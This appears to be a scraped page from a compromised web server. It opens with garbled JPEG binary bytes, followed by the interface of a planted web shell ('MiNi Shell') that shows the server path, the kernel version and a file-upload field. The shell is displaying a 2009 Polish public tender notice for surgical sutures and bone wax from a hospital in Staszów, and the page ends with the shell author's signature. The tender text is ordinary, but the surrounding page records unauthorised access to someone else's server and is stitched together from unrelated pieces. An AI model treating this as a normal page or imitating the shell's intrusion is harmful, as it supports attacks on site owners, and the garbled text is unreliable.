JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/118704-N-2009.html

<p class="kh_header"><b>Staszów: NICI CHIRURGICZNE dla potrzeb Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Staszowie.</b><br>
<b>Numer ogłoszenia: 118704 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. 11 Listopada 78, 28-200 Staszów, woj. świętokrzyskie, tel. 015 8642281 w. 204, faks 015 8643675.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NICI CHIRURGICZNE dla potrzeb Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Staszowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy NICI CHIRURGICZNYCH wyszczególnionych w załącznikach do poszczególnych pakietów.
Liczba pakietów - 5..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Do przetargu nie wymaga się wnoszenia wadium przez Wykonawców.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki udziału w postępowaniu o zamówienie publiczne. 
O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy:

1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
1.2.	Posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.	Ocena spełnienia warunków w postępowaniu o zamówienie publiczne 
Z ubiegania się o zamówienia publicznego wyklucza się Wykonawców, którzy:

-	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4,
-	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych,
-	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych Wykonawców w postępowaniu nie utrudnia uczciwej konkurencji,
-	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
-	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3,
-	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą,

3.	 Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.

4.	Ocena ofert w zakresie poszczególnych pakietów będzie niezależna od siebie. Odrzucenie oferty Wykonawcy w zakresie jednego pakietu nie powoduje automatycznie odrzucenia jego oferty w zakresie innego pakietu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty: 
1.	Dokumenty wymagane:
a)	Formularz ofertowy wypełniony i podpisany przez Wykonawcę z wykorzystaniem wzoru - zał. nr 7.
b)	Formularze cenowe (załączniki asortymentowe do poszczególnych pakietów) w zakresie wybranych przez wykonawcę pakietów od 1 do 5 - wypełnione i podpisane przez wykonawcę.
c)	Oświadczenie akceptujące stawiane warunki zamówienia i projektu umowy.
d)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
e)	Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.
f)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
g)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 i art. 24 Prawa zamówień publicznych - Załącznik numer 8 do SIWZ. 
h)	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
i)	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1, pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
j)	Oświadczenie Wykonawcy, że oferowane wyroby spełniają wymagania określone odpowiednimi przepisami prawa, spełniają normy jakościowe, posiadają aktualne dokumenty świadczące 
o wymaganym dopuszczeniu do stosowania i obrotu na terenie RP, dostarczany asortyment spełnia wymogi Ustawy z dnia 20 kwietnia 2004 o wyrobach medycznych, (Dz. U. nr 93 z 2004r. poz. 896). 
W oświadczeniu Wykonawca zobowiązuje się do przedstawienia wymaganych dokumentów na każde pisemne żądanie Zamawiającego (także przed rozstrzygnięciem przetargu - w ramach udzielanych na wezwanie zamawiającego wyjaśnień).
k)	Próbki do wszystkich pakietów w ilości 2 saszetek na każdą pozycję asortymentową (z opisem, do której pozycji i którego pakietu dotyczy)
l)	Katalogi w języku polskim do wszystkich pakietów. 

2.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.

3.	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenie oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, wykonawca składa następujące dokumenty:
a)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
i wartością dostawom lub usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie.

4.	W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowanie się przez Wykonawcę 
w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
a)	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, ważną w dniu złożenia oferty.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę/osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 65</li>
<li>2 - Jakość - 35</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzzoz.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Staszowie.
ul. 11 Listopada 78,
28 - 200 Staszów..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 10:00, miejsce: Sekretariat Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Staszowie.
ul. 11 Listopada 78,
28 - 200 Staszów..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Nici chirurgiczne 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.   Szew syntetyczny, wchłanialny, jałowy, plecionka, długość 70 - 75 cm, z igłą atraumatyczną, czas wchłaniania 56-90 dni, czas  							
	podtrzymywania tkanek - ok. 1 miesiąc							
1	 - Nr 1 igła 1/2 koła dł. 48 - 50mm okrągła	szt	360					
2	 - Nr 1 igła 1/2 koła dł. 40mm okrągła	szt	2000					
3	 - Nr 1 igła 1/2 koła dł. 30mm okrągła	szt	1600					
4	 - Nr 0 igła 1/2 koła dł. 30mm okrągła	szt	1500					
5	 - Nr 0 igła 1/2 koła dł. 35-37mm okrągła	szt	1500					
6	 - Nr 0 igła 1/2 koła dł 40mm okrągła, mocna	szt	120					
7	 - Nr 0 igła 5/8 koła dł. 40mm, okrągła, długość nitki 70-75cm lub 90cm	szt	120					
8	 - Nr 2/0 igła 1/2 koła dł. 22mm, mocna, okrągła	szt	72					
9	 - Nr 2/0 igła 1/2 koła dł. 25-26mm, okrągła	szt	1800					
10	 - Nr 2/0 igła 1/2 koła dł. 30mm, okrągła	szt	1500					
11	 - Nr 2/0 igła 1/2 koła dł. 35-37mm, okrągła	szt	1200					
12	 - Nr 2/0 igła 1/2 koła dł. 65-76mm, okrągła, długość nitki 70-75m lub 90cm	szt	60					
13	 - Nr 3/0 igła 1/2 koła dł. 20-22mm, okrągła	szt	720					
14	 - Nr 3/0 igła 1/2 koła dł. 25-26mm, okrągła	szt	720					
15	 - Nr 3/0 igła 1/2 koła dł. 30mm, okrągła	szt	720					
16	 - Nr 3/0 igła 3/8 koła dł. 19mm, ostra	szt	100					
17	 - Nr 3/0 igła 1/2 koła 17-18mmx2,okrągła	szt.	180					
18	 - Nr 4/0 igła 3/8 koła dł. 16-18mm, okrągła zaostrzona	szt	24					
19	 - Nr 4/0 igła 1/2 koła dł. 20-22mm okrągła	szt.	120					
	II. Szew syntetyczny, jałowy wchłanialny, bez igły (podwiązka)							
								
1	 - Nr 2/0, 12 x 45cm długości nitki	sasz.	540					
2	 - Nr 0, 6 x 45cm długości nitki	sasz.	200					
3	 - Nr 1, 6 x 45cm długości nitki	sasz.	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Nici chirurgiczne 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szew syntetyczny, wchłanialny, jednowłóknowy, okres wchłaniania do 180 dni, okres podtrzymywania tkanek ok. 60 dni.						
							
1	 - Nr 2/0 igła 1/2 koła, dł. 26mm, zaostrzona	szt.	36				
2	 - Nr 3/0 igła 1/2 koła, dł. 20mm, okrągła, nić-75cm	szt.	36				
3	 - Nr 4/0 igła 1/2 koła, dł. 16mm, 3/8 koła ostra, odwrotnie tnąca, dł. 45cm	szt.	36				
4	 - Nr 5/0 igła 16mm, 3/8 koła ostra odwrotnie tnąca, dł. 45cm	szt.	36				
							
	II. Szew syntetytczny, wchłanialny, jałowy, pleciony, powlekany, okres wchłaniania 56-70 dni, okres podtrzymywania tkanek 21-28 dni.						
							
1	 - Nr 1 igła dł.65mm 1/2 koła okrągła, nić 90cm	szt.	720				
2	 - Nr 2 igła dł.65mm 1/2 koła okrągła, nić 150cm	szt.	720				
3	 - Nr 2 igła dł.40mm  1/2 koła okrągła, nić 90 cm	szt.	2700				
4	 - Nr 2 igła dł. 48mm 1/2 koła okrągła, nić 90 cm	szt. 	2700				
5	 - Nr 0 bez igły  nić 150cm  (podwiązka)	sasz.	360				
6	 - Nr 1 bez igły  nić 150cm  (podwiązka)	sasz.	180				
7	 - Nr 2/0 bez igły nić 150cm  (podwiązka)	szt.	800				
							
	III. Szew syntetyczny, monofilament, czas podtrzymywania tkanek 10 dni, czas wchłaniania 50-56 dni, długość nici 90cm						
							
1	 - Nr 0 igła 1/2 koła dł. 37mm, okrągła	szt	108				
2	 - Nr 1 igła 1/2 koła dł. 37mm, okrągła	szt	108				
3	 - Nr 1 igła 1.2 koła dł. 40mm, okrągła	szt	108.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Nici chirurgiczne 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szew syntetyczny, niewchłanialny, jałowy, jednowłóknowy (nylonowy)			
				
1	 - Nr 2/0 igła dł. 24mm, 3/8 koła, ostra, nić -dł. 75cm	szt	3600	
2	 - Nr 3/0 igła dł. 24mm, 3/8 koła, ostra, nić -dł. 45cm	szt	3600	
3	 - Nr 4/0 igła dł. 19mm, 3/8 koła, ostra, nić -dł. 45cm	szt	424	
4	 - Nr 6/0 igła dł. 11mm, 3/8 koła, ostra, odwrotnie tnąca z mikroostrzem, nić -dł. 45cm, bezbarwny	szt	36	
5	 - Nr 0 igła dł. 40mm, 1/2 koła, ostra, nić -dł. 100cm	szt	720	
6	 - Nr 0 igła dł. 30mm, 1/2koła, okrągła nić -dł. 150cm	szt	360	
7	 - Nr 1 igła dł. 40mm, 1/2 koła, okrągła, nić dł. 100cm	szt	180	
	II. Szew syntetyczny, niewchłanialny, jednowłóknowy, polipropylenowy			
				
1	 - Nr 2/0 igła dł. 30mm x 2, 1/2 koła okrągła, nić - 90cm	szt.	360	
2	 - Nr 3/0 igła dł. 16-17mm x 2, 1/2 koła, okrągła, nić - dł. 90cm	szt.	36	
3	 - Nr 4/0 igła dł. 16-17mm x 2, 1/2 koła okrągła, nić. dł. 90cm	szt.	36	
4	 - Nr 5/0 igła dł. 13mm x 2, 1/2 koła, okrągła, nić - dł. 75cm	szt.	36	
5	 - Nr 6/0 igła dł. 13mm x 2, 1/2 koła, okrągła, nić - dł. 60-75cm	szt.	36	
	III. Szew naturalny, typu jedwab, niewchłanialny, wielowłóknowy			
				
1	 - Nr 2/0 igła dł. 16mm, 3/8 koła, ostra, odwrotnie tnąca, nić -dł. 75cm	szt.	36	
2	 - Nr 6/0 igła dł. 12mm, 3/8 koła, ostra odwrotnie tnąca, nić -dł. 45cm	szt.	36	
3	 - Nr 8/0 igła dł. 6mm, szpatula, nić -dł. 30cm	szt.	36.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Nici chirurgiczne 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szew syntetyczny antybakteryjny, powlekany, plecionka wchłanialny, długość nitki 70cm, z igłą atraumatyczną, czas 							
	wchłaniania 56-70 dni czas podtrzymywania tkanek ok. 1 miesiąc							
1	 - Nr 2/0 igła 1/2 koła dł. 17mm, okrągła	szt.	60					
2	 - Nr 2/0 igła 1/2 koła dł. 22mm, okrągła mocna	szt.	60					
3	 - Nr 0 igła 1/2 koła dł. 22mm, okrągła mocna	szt.	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Wosk kostny jałowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wosk kostny (np. Bone Vax, Eqiwax)	sasz.	60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com